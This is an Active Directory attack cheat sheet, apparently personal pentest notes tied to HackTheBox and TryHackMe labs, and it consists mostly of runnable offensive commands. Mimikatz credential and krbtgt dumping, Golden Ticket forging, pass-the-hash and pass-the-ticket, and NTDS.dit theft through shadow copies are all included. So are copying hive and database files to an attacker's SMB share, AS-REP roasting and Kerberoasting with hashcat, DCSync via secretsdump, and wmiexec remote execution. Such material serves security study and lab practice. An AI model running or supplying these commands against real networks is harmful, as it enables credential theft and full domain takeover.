Active Directory

  • Active Directory Basics
  • Attacking Kerberos
  • Exploiting a Domain Controller
  • Post exploitation tasks

mimikatz http://woshub.com/how-to-get-plain-text-passwords-of-windows-users/

Bypassing UAC https://0x00-0x00.github.io/research/2018/10/31/How-to-bypass-UAC-in-newer-Windows-versions.html

Lateral move https://www.hackingarticles.in/lateral-movement-over-pass-the-hash/

https://medium.com/r3d-buck3t/play-with-hashes-over-pass-the-hash-attack-2030b900562d

Dante https://karol-mazurek95.medium.com/dante-guide-htb-a7dfd0387a9c

AD enum https://notes.offsec-journey.com/privilege-escalation/domain-privilege-escalation#common-misconfigurations

https://github.com/jesusgavancho/TryHackMe_and_HackTheBox/blob/master/Windows%20Local%20Persistence.md

https://benheater.com/tryhackme-exploiting-active-directory/

https://trojand.com/cheatsheet/Windows/Initial_Foothold.html


GUI - Desktop


User password reset

Set-ADAccountPassword sophie -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose

Force a password reset at the next logon

Set-ADUser -ChangePasswordAtLogon $true -Identity sophie -Verbose

RDP


Remotely enable RDP using CrackMapExec

sudo crackmapexec smb 10.69.88.23 -u user -p password -M rdp -o ACTION=enable

RDP through Pass-the-Hash

xfreerdp /u:USER /d:DOMAIN /pth:NTLM /v:server.domain.local

RDP using mimikatz and PtH

sekurlsa::pth /user:user /domain:domain.local /ntlm:xxxxxxxxxxxxxxx /run:"mstsc.exe /restrictedadmin"

Mimikatz


Full dump

mimikatz.exe "token::elevate" "privilege::debug" "lsadump::lsa" "lsadump::sam" "lsadump::secrets" "lsadump::cache" "sekurlsa::logonpasswords"

Run as administrator (ensure this outputs [privilege “20” ok])

privilege::debug

Dump hashes

lsadump::lsa /patch

List active user sessions

sekurlsa::logonPasswords full

Get user password hashes and export to a text file

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" >> c:\tmp\mimikatz_output.txt

Golden Ticket

dump the hash and security identifier of the Kerberos Ticket Granting Ticket account allowing you to create a golden ticket

Dump the krbtgt Hash (krbtgt is a kerberosable user)

lsadump::lsa /inject /name:krbtgt

Create a Golden Ticket -

kerberos::golden /user:Administrator /domain:controller.local /sid:5508500012cc005cf7082a9a89ebdfdf /krbtgt:5508500012cc005cf7082a9a89ebdfdf (service NTLM hash) /id:500

open a new command prompt with elevated privileges to all machines

misc::cmd

Pass the Ticket w/ Mimikatz

Now that we have our ticket ready we can now perform a pass the ticket attack to gain domain admin privileges.

1.) kerberos::ptt ticket

klist - Here were just verifying that we successfully impersonated the ticket by listing our cached tickets. 

Ldap


Get machines names

crackmapexec smb 192.168.98.100-102

Initial info gathering

python3 /opt/ldapsearch-ad/ldapsearch-ad.py -l 192.168.98.100 -t info

nmap -n -sV --script "ldap* and not brute" 172.31.3.2 -Pn

Get naming context

# We also directly check nmap results
ldapsearch -H ldap://10.10.10.100 -x -s base namingcontexts

python3 /opt/ldapsearch-ad/ldapsearch-ad.py -l 192.168.10.100 -t info

Retrieve users (some users might be missing so worth doing a rpc request as well)

ldapsearch -x -H ldap://192.168.98.100 -D 'cyber.com' -w '' -b "DC=cyber,DC=com" > ldap_dc.txt
cat ldap_dc.txt| grep -i samaccountname | sed -e 's/samaccountname: //gi'



ldapsearch -H ldap://10.10.10.100 -x -b "dc=cyber,dc=com"

# We can also be more precised with 
ldapsearch -H ldap://10.10.10.100 -x -b "dc=cyber,dc=com" '(ObjectClass=)' "sAMAccountName" | grep sAMAccountName


# Other version
ldapsearch -x -H ldap://10.10.10.100 -D 'cyber.com' -w '' -b "DC=cyber,DC=com" > ldap_dc.txt
cat ldap_dc.txt| grep -i samaccountname | sed -e 's/samaccountname: //gi'

Check ldap entries

nmap -p389 10.0.2.23 --script=ldap-search

ldapsearch -x -b "dc=cyber,dc=com" -H ldap://10.0.2.23

# For windows we can use ldapadmin

Dump ldap data

ldapdomaindump -u dictionary.csl\\izabel -p "June2013" -o ldapdomaindump_artifacts 172.31.3.4

To retrieve the password field (which might not be included in our results). We can ssh on the ldap server and run (retrieve the password save in base64)

sudo slapcat

RPC


Retrieve users entries

rpcclient 10.10.10.100
rpcclient -U '' 10.10.10.100
rpcclient -U '' -N 10.10.10.100
# enumdomusers
# querydispinfo
# querydisplayinfo

crackmapexec smb megabank.local -u '' -p '' --users

Active Directory


Query the AD (with a domain user)

nmap -p389 10.0.2.23 --script=ldap-search --script-args="ldap.username=cybex\adam,ldap.password=Blue231,qfilter=users" -Pn


We can also use jxplorer

sudo apt install jxplorer

NTDS.dit & systemHive

Method 1

Make an accessible copy of the Active Directory Database

reg save HKLM\SYSTEM C:\system.hive

Let’s copy the DB into our kali

cp ntds.dit \\IP\smb\ntds.dit
cp C:\system.hive \\IP\smb\system.hive

Let’s retrieve the hashes from it

secretsdump.py -ntds ntds.dit -system system.hive 

Method 2

Make an accessible copy of the Active Directory Database

reg save HKLM\SYSTEM C:\temp\sys

use Vssadmin to copy ntds.dit

vssadmin create shadow /for=C:

Copy ntds.dit to C:\temp\

copy \\?\GLOBAL\Device\HarddiskVolumesShadowCopy1\Windows\NTDS\ntds.dit c:\temp\dit

Fix any corrupted content on our dit db

ESENTUTL /p c:\temp\dit /!1024 /8 /o

In Windows, let’s dump the hashes of all the users

powershell -eb bypass
Import-Module DSInternals
$key-Get-Bootkey -SystemHiveFilePath c:\temp\sys
Get-ADDBAccount -All -BootKey $key -DBPath c:\temp\dit

More about VSS

The Volume Shadow Copy Service (VSS) takes read-only snapshots of entire volumes periodically. In the case of VSS, a volume refers to a drive letter, typically the C drive.

These snapshots are used as backup points in a similar way to ‘restore’ points found in XP and any prior version. However, unlike a standard versioning system, VSS does not allow for shadow copies of individual files to be created, dealing only in full volumes. To optimize space these shadow copies are only a difference in the state of a snapshot, not a full copy of the file structure.

Standard users have no access to the VSS. Administrators have access to vssadmin, which can be used to create, list, and recover data from a shadow copy.

It is possible to list and recover individual files from the VSS, as per the three-step process below:

  1. vssadmin list shadows 2.iU set VSHADOW_DEVICE=\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
  2. for /R %VSHADOW_DEVICE%\ %i in (*) do @echo %i (Be aware that the output is verbose)

It’s also possible to copy specific files from the Volume Shadow Copy, directly to your own local system. An example of what that command would look like has been provided below:
copy %VSHADOW_DEVICE%\Users\Administrator\Desktop\secretfile.txt c:\Users\Administrator\Desktop

VSS is useful for recovering files that have been encrypted by ransomware, logs, and files that have been removed by an attacker, or even just for accidentally deleted files.

Please refer to the following MSDN article and vssadmin usage guide for more information on the subject.

DC / KErberos

Users enum

/opt/kerbrute userenum -d brute.csl --dc 172.31.3.3 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

kerbrute -users /usr/share/seclists/Usernames/Names/names.txt -domain BRUTE -dc-ip brute.csl

GetNPUsers


GetNPUsers.py brute.csl/ -usersfile name.txt -format john -outputfile hash

python /opt/impacket/build/scripts-3.9/GetNPUsers.py brute.csl/ -usersfile users.txt -dc-ip 172.31.3.3 -outputfile hashes.asreproast

impacket-GetNPUsers -dc-ip $DC_IP -request 'htb.local/'
impacket-GetNPUsers -dc-ip $DC_IP active.htb/user -no-pass

sudo python2 GetNPUsers.py -request -format john -dc-ip 172.31.3.4 dictionary/izabel -no-pass

then crack with hashcat

hashcat hash.txt rockyou.txt 

If GetNPUsers doesn’t work and we have a user with great permissions other another user, we can set the PREAUTH. Activate GetNPUsers for a user

Set-ADAccountControl -Identity user2 -DoesNotRequirePreAuth $true 

Retrieve AD users

/opt/impacket/examples/GetADUsers.py -all cyber.com/ketty.ayan:thePass! -dc-ip 192.168.98.100

Kerberoasting with GetUserSPNs

impacket-GetUsersSPNs -dc-ip $DC_IP active.htb/SVC_TGS:password 
# might need to adjust time on the VM
# sudo ntpdate $DC-IP

then crack with hashcat

hashcat -m 13100 hash.txt rockyou.txt -a

Secretdump

Retrieve all of the passwords hashes

impacket-secretsdump -just-dc backup:[email protected]

Tools


Start

# start
posershell -eb bypass
Import-Module .\PowerView.ps1

PowerView

Basics

Get info on the machines (part of the domain)

Get-NetComputer
Get-NetComputer -FullData
Get-NetComputer | select operatingsystem,dnshostname

Reverse DNS (find the IP of a machine)

Resolve-IPAddress CLIENT01

Show our Domain info

Get-NetDomain

Retrieve SID of the domain

Get-DomainSID

Retrieve the Domain controller info

Get-DomainController

About the Users / Groups

Get the users

# Long list
Get-NetUser

Get-NetUser -Username "name"

# Currated list
Get-NetUser | select samaccountname,lastlogon
Get-UserProperty -Properties lastlogon

The machine where currrent user has admin

Find-LocalAdminAccess -Verbose

Find specific string in user attribute

Find-UserField -SearchTerm Description -SearchTerm "built"

Get the groups (domain)

Get-NetGroup
Get-NetGroup -Domain htb.local

Get-NetGroup | select samaccountname

Get-NetGroup *admin*

Get-NetGroup "Sales department" | select member
Get-NetGroupMember -GroupName "Domain Admins"

Who is in what groups (domain groups)

Get-NetGroup | Get-NetGroupMember

https://powersploit.readthedocs.io/en/latest/Recon/Get-NetLocalGroupMember/

Enumerate members of a local group on a remote machine (without admin privileges)

Get-NetLocalGroupMember --ComputerName client01 -GroupName mygroup (-Credential <PSCredentials>)

Get-NetLocalGroup --ComputerName client01 [-API]

User hunting: Searching in logged on accounts

# This combine multiple commands
Invoke-UserHunter

# Show who has a session on Client01
Get-NetSession -ComputerName Client01 --verbose


#  Who's connected
Get-LastLoggedOn
Get-NetLoggedOn -ComputerName Client01
Get-NetLoggedOnLocal

# can also use sysinternal tools
.\PsLoggedon.exe \\client01

Search for Domain Admin

# noisy
Find-LocalAdminAccess

Enumerate commonly trafficked servers and query

stealth

Shares

Find shares

Invoke-ShareFinder

Find sensitive files in the domain

Invoke-FileFinder

Find all the file servers in the domain

Get-NetFileServer

Object Permissions, Group permissions (GPO)

GenericAll: Full perms GenericWrite: Edit certain object WriteOwner: Change ownership on an object WriteDACL: edit perms AllExtendedRights: Change password,reset password, etc… ForceChangePasssword: Password Change for Object Self: Self membership

Get the GPO

Get-NetGPO

List any admins

Find-GPOComputerAdmin -ComputerName dc01.htb.local

List anyone who can administer any machine (through GPO)

Find-GPOLocation

Organization Unit (OU)

Get-NetOU -FullData

List insteresting ACLs

Invoke-ACLScanner -ResolveGUIDs

Show anyone with GenericAll on the “management department” group

Get-ObjectAcl -SamAccountName "user1" -ResolveGUIDs


Get-ObjectAcl -Identity "Management department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"}

# Shorter version
Get-ObjectAcl -Identity "Management department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights

# Other version
Get-ObjectAcl -Identity "jen" | ? {$_.ActiveDirectoryRights -eq "GenericAlll"} | select SecurityIdentifier,ActiveDirectoryRights

Translate SecIdentifier to a name

"SIDXXX","OTHER-SID" | Convert-SidToName

Change password of user on domain

net user jen Password123 /domain

Impersonate, Launch a command prompt as jen

# Runas 
runas /user:corp\jen powershell.exe

Bloodhound


Start

# start
posershell -eb bypass
Import-Module .\SharpHound.ps1

Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Temp -OutputPrefix "corp_audit"

Impacket


https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/

https://neil-fox.github.io/Impacket-usage-&-detection/

lookupsid.py is a tool for brute forcing Windows SID’s which will attempt to identify remote users/groups.

Enumerate the domain with lookupsid.py

for user in $(cat users.txt); do lookupsid.py svccorp.com/$user:'Password123'@172.31.2.1; done

Secretsdump is a script used to extract credentials and secrets from a system. The main use-cases for it are the following:

Dump NTLM hash of local users (remote SAM dump) Extract domain credentials via DCSync

secretsdump.py svcorp/Administrator:mypass@IP
secretsdump.py -no-pass -just-dc svcorp/user1@IP

wmiexec.py is another script part of the Impacket framework. It is used to silently execute commands against a compromised endpoint using WMI.

python3 /opt/impacket/examples/wmiexec.py -hashes ':533f1bd576caa912bdb9da284bbc60fe' 'za.tryhackme.com/[email protected]'

python3 /opt/impacket/examples/wmiexec.py 'za.tryhackme.com/administrator:[email protected]'